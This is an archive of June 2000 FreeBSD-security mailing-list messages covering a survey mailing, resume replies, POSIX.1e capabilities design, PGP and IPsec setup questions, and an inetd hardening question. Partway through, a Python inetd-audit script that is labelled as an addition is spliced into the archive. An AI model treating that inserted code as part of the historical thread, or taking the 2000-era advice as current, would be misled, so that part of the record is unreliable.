From owner-freebsd-security Sun Jun 18 7:22:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from southern-software.com (rosetta.thundercat.com [203.37.173.7]) by hub.freebsd.org (Postfix) with SMTP id AC38237BBC5; Sun, 18 Jun 2000 07:22:19 -0700 (PDT) (envelope-from info@southern-software.com)
Received: from southern-software.com [198.142.196.124] by southern-software.com (SMTPD32-4.06) id A8BAC73A0392; Sun, 18 Jun 2000 00:22:34 PDT
From: info@southern-software.com
Reply-To: info@southern-software.com
To: info@southern-software.com
Subject: Can you please assist ?
Date: Sun, 18 Jun 2000 00:23:37 PDT
Message-Id: <20000618142219.AC38237BBC5@hub.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

___________________________________________________________

We are a software development company that specializes in security software. For some time now we have been working on developing a client email program that contains security features never before available. In order for us to make this program the best that it can possibly be, we ask your assistance by taking a few minutes to answer these important questions for us.

Which of the following functions do you consider to be important or essential for an email program? For questions 1-7, please rate 1-5 (1 being the least important and 5 being the most important).

A client email program should have:

Question 1: The ability to prevent certain attachments that may possibly be carrying a virus. (This allows you to accept only safe attachments.)
Importance Rating ______

Question 2: Automatic searching for file attachments that have been renamed or tampered with. (Virus senders can rename vbs files to txt files hoping you will open them.)
Importance Rating ______

Question 3: The ability to limit the size of incoming email and attachments. (Reduce time wasted downloading large files, graphics, audio files, jokes, etc.)
Importance Rating ______

Question 4: The ability to select the size of outgoing emails and attachments. (Saves bandwidth, as large files are roughly doubled when transferred by email.)
Importance Rating ______

Question 5: An encrypted address book. (This will stop worm viruses sending copies of themselves to your clients and/or friends.)
Importance Rating ______

Question 6: The ability to restrict the number of attachments and size of attachments sent or received, and the ability to restrict the types of attachments received. (Gives control to employers and eliminates privacy issues arising.)
Importance Rating ______

Question 7: A viewable log file containing information such as: email deleted without being opened, when email was downloaded, when email was read (opened), if email was forwarded or replied to, etc. (Mail management and accountability at a glance.)
Importance Rating ______

Question 8: Has your company been the victim of a computer virus attack?
Yes/No ________

Question 9: If yes to question 8, approximately how many hours did it take to fix the problem?
Hours ________

Question 10: If an email program was developed with the above security features, would you be interested in trialing a free demonstration version?
Yes/No ________

Question 11: What percentage of email traffic is personal email?
__________%

We sincerely thank you for your time in answering these important questions for us.

Sincere thanks,
Graeme A.
Ryan

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 9:15:17 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gnu.IN-Berlin.DE (gnu.in-berlin.de [192.109.42.4]) by hub.freebsd.org (Postfix) with ESMTP id A083637B6C8; Sun, 18 Jun 2000 09:15:10 -0700 (PDT) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de)
Received: from uriela.in-berlin.de (root@servicia.in-berlin.de [193.175.21.3]) by gnu.IN-Berlin.DE (8.10.1/8.10.1) with ESMTP id e5IGF8x26268; Sun, 18 Jun 2000 18:15:08 +0200 (CEST) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de)
Received: by uriela.in-berlin.de (Smail-3.2.0.102 1998-Aug-2 #2) id m133hj1-0058EHC; Sun, 18 Jun 2000 18:15:07 +0200 (CEST)
Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id DAA05203; Sun, 18 Jun 2000 03:16:56 +0200 (CEST) (envelope-from ripley)
Date: Sun, 18 Jun 2000 03:16:56 +0200
From: "H. Eckert"
To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Cc: jlschwab@uswest.net
Subject: Re: Resume...
Message-ID: <20000618031620.B3840@server.nostromo.in-berlin.de>
Reply-To: ripley@nostromo.in-berlin.de
References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
In-Reply-To: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>; from Jason L. Schwab on Sat, Jun 17, 2000 at 08:47:05AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Quoting Jason L. Schwab (jlschwab@uswest.net):
> X-Mailer: Microsoft Outlook Express 5.00.2615.200
> I am 17 years of age.
> I consider myself a professional unix system administrator.

Consider yourself lucky to be qualified to admin a microwave at a fast-food restaurant. This might even help you to get a chance to get a real qualification in the near future.

Greetings,
Ripley

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 9:21:39 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2B24937B55F for ; Sun, 18 Jun 2000 09:21:32 -0700 (PDT) (envelope-from rwatson@FreeBSD.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA06686; Sun, 18 Jun 2000 12:21:27 -0400 (EDT) (envelope-from rwatson@FreeBSD.org)
Date: Sun, 18 Jun 2000 12:21:27 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: posix1e@cyrus.watson.org
To: posix1e@cyrus.watson.org
Cc: trustedbsd-discuss@trustedbsd.org, linux-privs-discuss@sourceforge.net
Subject: Capabilities workshop, followup questions
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

First I'd like to report that the recent capabilities workshop held by SGI was a great success, at least from my perspective. A number of wrinkles were worked out, and it looks like the resulting implementations will be consistent and highly interoperable from an application perspective, as well as from the perspective of analysis for evaluation. I'd like to publicly thank Casey and the others at SGI who made the event work so well :-).

There are a few followup questions in my mind. First, for the purposes of a record (as it was pointed out at the meeting that for POSIX.1e discussions, there really hasn't been a record), I think it would be useful for us to write up our conclusions. In particular, conclusions as to what the correct interaction between uid-based models and capability-based models should be, and rationale for that.
Additionally, what we concluded as correct behavior for environments where (a) no on-disk capabilities are available, (b) situations where capabilities are available but undefined for an executable. Finally, we reached some conclusions about inheritance properties over exec(), and probably ought to describe rationale for that also.

I didn't take notes during the meeting, so I'll just address the ones that I come to off the top of my head.

We concluded that the superuser security model and capability-based models should be, wherever possible, independent. We found it difficult to reason effectively about the variety of "emulation" options, and found that the interactions often resulted in what was generally agreed to be in violation of POLA. One important aspect to the discussion was migration path: all parties seemed to be in agreement that the eventual goal was removal of a privileged uid 0, but that the migration path would be long and painful :-). The stepping stones appeared to be:

- Capabilities support without file system backing, privileged uid0
- Capabilities support with file backing, privileged uid0
- Capabilities support with file backing

There was fairly heated debate on the topic of the merged uid/capability implementation in Linux, with objections to it including complexity and interoperability. Positive considerations for the model included a possibly easier migration path with the opportunity to use capabilities to improve security in the short term, prior to file system backing.

The eventual pseudo-code for the authorization check looked something like the following (with a slightly bsd-esque twist):

    int
    capable(credential, capability)
    {
        if (cap_check(credential, capability) &&
            optional_capability_mask(capability)) {
            /* audit() */
            return (1);
        }
        if (suser(credential) && optional_suser_mask(capability) &&
            suser_enabled()) {
            /* audit() */
            return (1);
        }
        return (0);
    }

There was discussion of introducing both a global capability mask at inheritance time and runtime, as well as a per-process bound inherited and modifiable only with privilege. There did seem to be general support for a global bound, not unlike BSD secure-levels, disabling specific capabilities for all processes. There was also discussion of whether or not the same bound should apply to super-user authorization, and that sounded good to many also. There was an objection (mine) to conditionalizing suser behavior on whether or not capabilities were present on a process -- generally that this caused more interaction between the two mechanisms, which would limit extensible authorization techniques such as Poligraph.

Per-process bounds, we concluded, had to be thought through. It did seem to be the case that such behavior might be useful (jail-like), but that it would open the door to more attacks like the sendmail attack if permitted for unprivileged processes (not unlike chroot). There was general discussion about whether jail techniques should or should not be integrated with capabilities. I don't think there was consensus about introducing per-process capability bounds, but that there was for global bounds, and that the global bounds would be instituted at authorization, not inheritance.

Given that different systems have different ways of managing kernel configuration at run time, and that global bounds are likely part of system bootup, I don't think there was consideration of an API for doing that. At least in the FreeBSD implementation, this is managed using a sysctl(), but /proc in Linux-land might be a good way. Monotonicity for a global bound sounds useful.

One issue that was discussed is behavior on file systems supporting capabilities, but with capability sets undefined for a binary. Two prevailing views seemed to hold: James Buster argued that POLA requires that these binaries inherit capabilities from the parent process, if the parent permits it. Casey believed that they should only be inherited if the binary was explicitly configured to accept them. The second appealed due to security, but is counter-intuitive for many uses. One possibility is to assign appropriate capability acceptance on all binaries in the TCB, allowing audited system binaries to accept capabilities, but not custom binaries that haven't been vetted by the system administrator. As one potential use of capabilities is assigning a shell CAP_DAC_READ, it would indeed be violating POLA if shell built-in functions worked to read files, but external programs didn't :-).

Finally, I had a few questions about things we did not resolve. First, in the setuid world, modifications to the setuid binary result in removal of the setuid bit. Should modifications to a capabilities binary result in capabilities being removed?

Richard Offer and I discussed issues of threading and capabilities in the morning, and brought it up again briefly in the afternoon. Ted Ts'o noted that the Linux uid handling for POSIX threads is currently not correct according to spec (which might break things in an m:n threading model), and I was interested in whether or not the same problems will occur with capabilities. In the POSIX world, privilege and credentials are bound to processes, and not threads; this is how it is in FreeBSD currently as we don't support kernel threads except under emulation. Will the Linux implementation bind capabilities to individual threads?

As I don't have a copy of D16, I can't comment on the rule set differences, but it sounded to me like we firmly concluded the D16 inheritance rules were the way to go. Could someone post the conclusions on that?

I've presumably missed some stuff here, and would welcome comments and criticisms. I've set the Reply-To to the POSIX.1e cross-platform mailing list, as the resolution to these issues is relevant to all platforms, especially in the name of application portability. I've CC'd it to the two capabilities implementation mailing lists I know of -- the TrustedBSD discussion list, and the linux-privs list.

Robert N M Watson
robert@fledge.watson.org
http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 13:04:05 2000
Delivered-To: freebsd-security@freebsd.org
Received: from adsl-63-201-55-220.dsl.snfc21.pacbell.net (adsl-63-201-55-220.dsl.snfc21.pacbell.net [63.201.55.220]) by hub.freebsd.org (Postfix) with ESMTP id C496A37BA06 for ; Sun, 18 Jun 2000 13:03:57 -0700 (PDT) (envelope-from jwgray@netbox.com)
Received: from netbox.com (adsl-63-201-55-220.dsl.snfc21.pacbell.net [63.201.55.220]) by adsl-63-201-55-220.dsl.snfc21.pacbell.net (8.9.3/8.9.3) with ESMTP id NAA64198; Sun, 18 Jun 2000 13:03:31 -0700 (PDT) (envelope-from jwgray@netbox.com)
Message-ID: <394D2B13.47307E1A@netbox.com>
Date: Sun, 18 Jun 2000 13:03:31 -0700
From: Jeff Gray
Reply-To: jwgray@netbox.com
X-Mailer: Mozilla 4.08 [en] (X11; I; Linux 2.0.36 i386)
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: PGP keys and signing
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Struggling with two PGP issues, hoping that someone can help
enlighten me. Same problem on both 3.3 and 4.0 so not likely to be OS caused. PGP5 from ports used. 4.0 box never had PGP on it.

1. Can encrypt, but not decrypt message from recipient.

       pgpe -r name@address.com -at file

   works fine. 'name' receives and can decrypt. When recipient sends to me I cannot decrypt. pgpk -c shows that the key is in the right place and matches. If I go to my PGP5 version on my Mac I can decrypt the message. Ideas?

2. Signing.

       pgpe -r name@address.com -sat file

   encrypts fine but does not sign. Even tried -s -u userid and still does not sign.

       pgps -u user -at file

   signs as it should. Cannot figure out how to encrypt and sign in one step. Thoughts appreciated.

Thanks
jeff

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 15:25:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pop.idx.com.au (pop.idx.com.au [203.14.30.10]) by hub.freebsd.org (Postfix) with ESMTP id D868E37B56A; Sun, 18 Jun 2000 15:24:54 -0700 (PDT) (envelope-from dannyh@idx.com.au)
Received: from desktop.freebsd.org (tntwc01-3-126.idx.com.au [203.166.3.126]) by pop.idx.com.au (8.9.3/8.9.3) with SMTP id IAA19879; Mon, 19 Jun 2000 08:24:36 +1000
From: Danny
To: "Jason L. Schwab" , ,
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 08:30:50 +1000
X-Mailer: KMail [version 1.0.21]
Content-Type: text/plain
References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>
MIME-Version: 1.0
Message-Id: <00062008333302.00328@desktop.freebsd.org>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I believe if you go to the FreeBSD website there is a hyperlink for a FreeBSD jobs mailing list. Maybe it is called freebsd_jobs@freebsd.org; maybe it is a more suitable area to post your resume.

On Sun, 18 Jun 2000, Jason L. Schwab wrote:
>
>%_Hello Everyone;
>
> Hi. My name is Jason L. Schwab. How are you doing today?
>
> Well first of all, let me tell you a little about myself. I am 17
> years of age. I am located in Albuquerque, New Mexico, USA. I have just
> over 5 years of Unix and Linux experience. I am looking to get a lot more
> experience in the internet and/or unix servers area. I am looking to do
> this by working for an Internet Service Provider.
>
> The list below contains a very small portion of my capabilities.
>
> - Perl Programming
> - C/C++ Programming
> - HTML Programming
> - CGI Programming
> - Apache (Complete Configuration)
> - DNS / BIND / NAMED Primary/Secondary
> - Mail Servers (postfix/sendmail/qmail)
> - FTP Servers (wuftpd/ncftpd/proftpd/ftpd-bsd)
> - SSH (of course ;))
> - syslogd (logging to outside hosts)
> - Kernels and System Upgrades
> - Security Knowledge (tripwire/kern.securelevel)
> - Firewalls and Networking
> - Windows 95/98 Tech. Support
> - Unix/Linux Tech. Support (*BSD/Linux Only)
>
> There are a lot more items on that list! It's just a small part of my
> capabilities, and I am learning more by the day. One of my favorite
> hobbies is remote unix administration, I think it's the best job
> any one could ever have, so yes I am willing to do remote unix
> administration. I am looking to do mainly networking and security.
>
> As far as my security knowledge is, I have been doing unix and linux
> security for just over 3 years now. In this time period I have never had a
> security problem ever. Just to test my own security knowledge, I hosted
> a machine running BSD and I gave out a public account on it, I emailed
> every unix and linux security mailing list with the login information I
> had over 500 people trying to breach my security and for the three months
> I ran it, no one, not a single person compromised that machine.
>
> I have worked for an Internet Service Provider before, NMIA.COM,
> New Mexico Internet Access, which was strictly temporary employment
> which is why I no longer work there. I was doing Client Firewalling, Unix
> Programming and a lot of misc. tasks.
>
> I consider myself a professional unix system administrator. I have run
> two small web hosting companies for friends of mine, I have helped
> administrate about a total of 10 small web hosting and unix shell
> account servers worldwide. So I have a wide range of
> experience within the unix and linux area.
>
> Sincerely,
> Jason L. Schwab - jlschwab@uswest.net
>
>
>
> ----------------------------------------
> ----------------------------------------

--
------------------------------------------------------------
You are not authorized to use my email address for spam or any purpose whatsoever. Remove my email address from your databases immediately and do not attempt to email me in any way.
------------------------------------------------------------

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 16:14:01 2000
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 94B1F37BADA; Sun, 18 Jun 2000 16:13:56 -0700 (PDT) (envelope-from dave@elvis.mu.org)
Received: by elvis.mu.org (Postfix, from userid 1088) id B820F2B254; Sun, 18 Jun 2000 18:13:55 -0500 (CDT)
Date: Sun, 18 Jun 2000 18:13:55 -0500
From: Dave McKay
To: Danny
Cc: "Jason L. Schwab" , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Message-ID: <20000618181355.A24317@elvis.mu.org>
References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> <00062008333302.00328@desktop.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <00062008333302.00328@desktop.freebsd.org>; from dannyh@idx.com.au on Tue, Jun 20, 2000 at 08:30:50AM +1000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Actually, just post to dice.com, monster.com or headhunter.net; usually the freebsd-jobs lists are for recruiters.

> Maybe it is called freebsd_jobs@freebsd.org
>
> maybe it is a more suitable area to post your resume.
>
> On Sun, 18 Jun 2000, Jason L. Schwab wrote:
> >
> >%_Hello Everyone;
> >
> > Hi. My name is Jason L. Schwab. How are you doing today?
> >
> > Well first of all, let me tell you a little about myself. I am 17
> > years of age. I am located in Albuquerque, New Mexico, USA. I have just
> > over 5 years of Unix and Linux experience. I am looking to get a lot more
> > experience in the internet and/or unix servers area. I am looking to do
> > this by working for an Internet Service Provider.

Being 17 years of age is going to bring you bias in the field. Also 5 years experience on most resumes means you have 5 years in the field working on live production systems.

> > There are a lot more items on that list! It's just a small part of my
> > capabilities, and I am learning more by the day. One of my favorite
> > hobbies is remote unix administration, I think it's the best job
> > any one could ever have, so yes I am willing to do remote unix
> > administration. I am looking to do mainly networking and security.

Remote administration is possible, but not plausible; what happens when a server of yours crashes? Termservers are costly in a large production environment.

> >
> > As far as my security knowledge is, I have been doing unix and linux
> > security for just over 3 years now. In this time period I have never had a
> > security problem ever. Just to test my own security knowledge, I hosted
> > a machine running BSD and I gave out a public account on it, I emailed
> > every unix and linux security mailing list with the login information I
> > had over 500 people trying to breach my security and for the three months
> > I ran it, no one, not a single person compromised that machine.

Having scriptkiddies run around on your box is not a test of security. And bugtraq/rootshell are usually around 3 months behind the times.

> > I consider myself a professional unix system administrator. I have run
> > two small web hosting companies for friends of mine, I have helped
> > administrate about a total of 10 small web hosting and unix shell
> > account servers worldwide. So I have a wide range of
> > experience within the unix and linux area.

Be careful how you word these things, some people may take offense to your "wide range" of skills.

--
Dave McKay
Network Engineer - Google Inc.
dave@mu.org - dave@google.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 18 21:49:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from spike.brainlink.com (spike.brainlink.com [206.127.59.100]) by hub.freebsd.org (Postfix) with ESMTP id 40A4537BBB9 for ; Sun, 18 Jun 2000 21:49:22 -0700 (PDT) (envelope-from spork@spike.brainlink.com)
Received: (from spork@localhost) by spike.brainlink.com (8.9.3/8.9.3) id AAA01498 for freebsd-security@freebsd.org; Mon, 19 Jun 2000 00:48:02 -0400 (EDT) (envelope-from spork)
Date: Mon, 19 Jun 2000 00:48:02 -0400
From: Spike Gronim
To: freebsd-security@freebsd.org
Subject: Ipsec misconfiguration problem
Message-ID: <20000619004802.A1461@spike.brainlink.com>
Reply-To: gronimw@stuy.edu
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="r5Pyd7+fXNt84Ff3"
X-Mailer: Mutt 1.0.1i
X-PGP-Public-Key: http://www.gronim.com/spike/pubkey.asc
X-PGP-fingerprint: 05 92 88 05 3C DB F2 40 AB 1D AE 2A F0 E5 FA A5
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--r5Pyd7+fXNt84Ff3
Content-Type: text/plain; charset=us-ascii

Hey. I'm trying to set up a simple ipsec connection between two computers on my LAN (192.168.0.1 and 192.168.0.200). I'm going for ipsec esp in transport mode with authentication. I tried a lot of things, and then copied the NetBSD documentation setup (http://www.netbsd.org/Documentation/network/ipsec/#sample_esp):

(long lines wrapped)

[ipsec.conf]
add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge";
add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga";
add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge";
add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga";
spdadd 192.168.0.1 192.168.0.200 any -P out\
    ipsec esp/transport//use ah/transport//use;
[ipsec.conf]

'setkey -D' and 'setkey -D -P' on 192.168.0.1 are attached.
The ipsec.conf file for setkey on 192.168.0.200 is the same as that on 192.168.0.1, with the IPs swapped. The ipsec code sees my keys, my security associations, and my security policies. Yet, when I 'ping 192.168.0.200', tcpdump shows me straight ICMP instead of ESP, and neither side's sequences or byte counters increment. I'm not sure what I'm doing wrong. Thanks.

--Spike Gronim
gronimw@stuy.edu
"Oh yes? An obscene triangle which, has more courage than the word."

--r5Pyd7+fXNt84Ff3
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=setkey-d

192.168.0.200 192.168.0.1
        ah mode=any spi=10001(0x00002711) replay=4 flags=0x00000000
        A: hmac-md5 6d6f6761 6d6f6761 6d6f6761 6d6f6761
        state=mature seq=3 pid=1491
        created: Jun 19 00:38:23 2000   current: Jun 19 00:47:30 2000
        diff: 547(s)    hard: 0(s)      soft: 0(s)
        last:           hard: 0(s)      soft: 0(s)
        current: 0(bytes)       hard: 0(bytes)  soft: 0(bytes)
        allocated: 0    hard: 0 soft: 0
        refcnt=1
192.168.0.1 192.168.0.200
        ah mode=any spi=9877(0x00002695) replay=4 flags=0x00000000
        A: hmac-md5 686f6765 686f6765 686f6765 686f6765
        state=mature seq=2 pid=1491
        created: Jun 19 00:38:23 2000   current: Jun 19 00:47:30 2000
        diff: 547(s)    hard: 0(s)      soft: 0(s)
        last:           hard: 0(s)      soft: 0(s)
        current: 0(bytes)       hard: 0(bytes)  soft: 0(bytes)
        allocated: 0    hard: 0 soft: 0
        refcnt=1
192.168.0.200 192.168.0.1
        esp mode=any spi=10000(0x00002710) replay=4 flags=0x00000000
        E: des-cbc 6d6f6761 6d6f6761
        state=mature seq=1 pid=1491
        created: Jun 19 00:38:23 2000   current: Jun 19 00:47:30 2000
        diff: 547(s)    hard: 0(s)      soft: 0(s)
        last:           hard: 0(s)      soft: 0(s)
        current: 0(bytes)       hard: 0(bytes)  soft: 0(bytes)
        allocated: 0    hard: 0 soft: 0
        refcnt=1
192.168.0.1 192.168.0.200
        esp mode=any spi=9876(0x00002694) replay=4 flags=0x00000000
        E: des-cbc 686f6765 686f6765
        state=mature seq=0 pid=1491
        created: Jun 19 00:38:23 2000   current: Jun 19 00:47:30 2000
        diff: 547(s)    hard: 0(s)      soft: 0(s)
        last:           hard: 0(s)      soft: 0(s)
        current: 0(bytes)       hard: 0(bytes)  soft: 0(bytes)
        allocated: 0    hard: 0 soft: 0
        refcnt=1

--r5Pyd7+fXNt84Ff3
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=setkey-d-p

192.168.0.1[any] 192.168.0.200[any] any
        out ipsec
        esp/transport//use
        ah/transport//use
        seq=0 pid=1492
        refcnt=1

--r5Pyd7+fXNt84Ff3--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jun 19 6:21:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from relay.inforser.ru (relay.inforser.ru [195.54.223.182]) by hub.freebsd.org (Postfix) with ESMTP id 4745237B653 for ; Mon, 19 Jun 2000 06:21:00 -0700 (PDT) (envelope-from oleg@inforser.ru)
Received: from iNDiAN (164.inforser.ru [195.54.223.164]) by relay.inforser.ru (8.9.2/8.9.3) with SMTP id RAA26721 for ; Mon, 19 Jun 2000 17:18:52 +0400 (MSD)
Message-ID: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru>
From: "Oleg Strizhak"
To: "FreeBSD-security"
Subject: tried to be cracked
Date: Mon, 19 Jun 2000 17:19:34 +0400
Organization: Inforser
MIME-Version: 1.0
Content-Type: text/plain; charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi all!

Today seeing this in messages:

Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534

Checked all the logs -- there was no login via telnet, ssh. Nothing of activity was detected for that period of time on my http or ftp daemons.
= So I suppose that it was through one of the predifined inetd services.=20 Here is my inetd.conf's enabled nodes: ftp stream tcp nowait root /usr/local/sbin/proftpd proftpd telnet stream tcp nowait root /usr/libexec/telnetd telnetd shell stream tcp nowait root /usr/libexec/rshd rshd login stream tcp nowait root /usr/libexec/rlogind rlogind finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s comsat dgram udp wait tty:tty /usr/libexec/comsat comsat ntalk dgram udp wait tty:tty /usr/libexec/ntalkd ntalkd # # IPv6 services # ftp stream tcp6 nowait root /usr/local/sbin/proftpd proftpd telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd shell stream tcp6 nowait root /usr/libexec/rshd rshd login stream tcp6 nowait root /usr/libexec/rlogind rlogind finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s Question is: which of these daemons can be disabled (or even inetd = itself) w/o any harm. I've no use of NFS -- plain http/ftp/pop server. = SMTP and POP stuff is already handled by tcpserv. I've already set up hosts.allow: denied any w/o reverse DNS, allowed any = ftp, portmap, and ssh; denied all other daemons/users except trusted = address. Where can I find out additional info about hosts.allow syntax? Thanx in advance. 
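An added check for the question above (example code, not part of the thread or of FreeBSD): it parses the enabled inetd.conf entries quoted in the message and lists the services a plain http/ftp/pop server can drop, following the advice given in the replies. The sample input is the inetd.conf from the message embedded as constructed data; the reasons table and the shell-accounts switch are this example's own assumptions.

```python
"""Audit the enabled entries of an inetd.conf and list the ones a plain
http/ftp/pop server can do without. Added example, not from the thread."""
from dataclasses import dataclass

# Constructed sample input: the enabled inetd.conf lines quoted in the message.
INETD_CONF = """\
ftp     stream  tcp     nowait  root    /usr/local/sbin/proftpd proftpd
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
shell   stream  tcp     nowait  root    /usr/libexec/rshd       rshd
login   stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
finger  stream  tcp     nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
comsat  dgram   udp     wait    tty:tty /usr/libexec/comsat     comsat
ntalk   dgram   udp     wait    tty:tty /usr/libexec/ntalkd     ntalkd
#
# IPv6 services
#
ftp     stream  tcp6    nowait  root    /usr/local/sbin/proftpd proftpd
telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd
shell   stream  tcp6    nowait  root    /usr/libexec/rshd       rshd
login   stream  tcp6    nowait  root    /usr/libexec/rlogind    rlogind
finger  stream  tcp6    nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
"""

# Why each legacy service is worth turning off. This table is the example's
# own and follows the advice in the replies: ssh replaces telnet/rsh/rlogin,
# finger leaks account information, and comsat/ntalk only earn their keep
# when the box has shell accounts.
LEGACY = {
    "telnet": "cleartext remote login and password; use ssh instead",
    "shell": "rsh: host-based trust, cleartext session; use ssh instead",
    "login": "rlogin: host-based trust, cleartext session; use ssh instead",
    "exec": "rexec: cleartext password",
    "finger": "discloses account names and login activity to anyone",
    "comsat": "mail-arrival notification; only useful with shell accounts",
    "ntalk": "talk daemon; only useful with shell accounts",
}
SHELL_ONLY = {"comsat", "ntalk"}  # kept only when shell accounts exist


@dataclass(frozen=True)
class InetdEntry:
    service: str
    socktype: str
    proto: str
    wait: str
    user: str
    program: str


def parse_inetd_conf(text):
    """Return the enabled (non-comment) entries as InetdEntry records."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # too short to be a valid entry; inetd would reject it
        entries.append(InetdEntry(*fields[:6]))
    return entries


def to_disable(entries, shell_accounts=False):
    """Services to comment out. With shell accounts the talk/comsat daemons
    are kept; the cleartext login services and finger are never kept."""
    drop = set()
    for e in entries:
        if e.service in LEGACY and not (shell_accounts and e.service in SHELL_ONLY):
            drop.add(e.service)
    return drop


def remaining(entries, shell_accounts=False):
    """What inetd still has to serve after the cleanup; an empty set means
    inetd itself can be switched off."""
    return {e.service for e in entries} - to_disable(entries, shell_accounts)


def report(text, shell_accounts=False):
    """Findings, one per line; the last line is the verdict on inetd itself."""
    entries = parse_inetd_conf(text)
    lines = []
    for svc in sorted(to_disable(entries, shell_accounts)):
        protos = ",".join(sorted({e.proto for e in entries if e.service == svc}))
        lines.append(f"disable {svc} ({protos}): {LEGACY[svc]}")
    left = remaining(entries, shell_accounts)
    if left:
        lines.append("inetd still needed for: " + ", ".join(sorted(left)))
    else:
        lines.append("nothing left: inetd itself can be disabled")
    return lines


if __name__ == "__main__":
    print("\n".join(report(INETD_CONF)))
```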
From owner-freebsd-security Mon Jun 19 6:45:58 2000
From: "tjk@tksoft.com"
To: oleg@inforser.ru (Oleg Strizhak)
Cc: FreeBSD-security@FreeBSD.ORG
Subject: Re: tried to be cracked
Date: Mon, 19 Jun 2000 06:51:43 -0700 (PDT)
Message-Id: <200006191351.GAA07969@uno.tksoft.com>
In-Reply-To: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru> from "Oleg Strizhak" at Jun 19, 0 05:19:34 pm

You don't need any service you don't know about.

You can disable all of them, except ftp and telnet, if you use telnet. You should also not have any daemons running which you don't use: mountd, nfsd, portmap, etc.

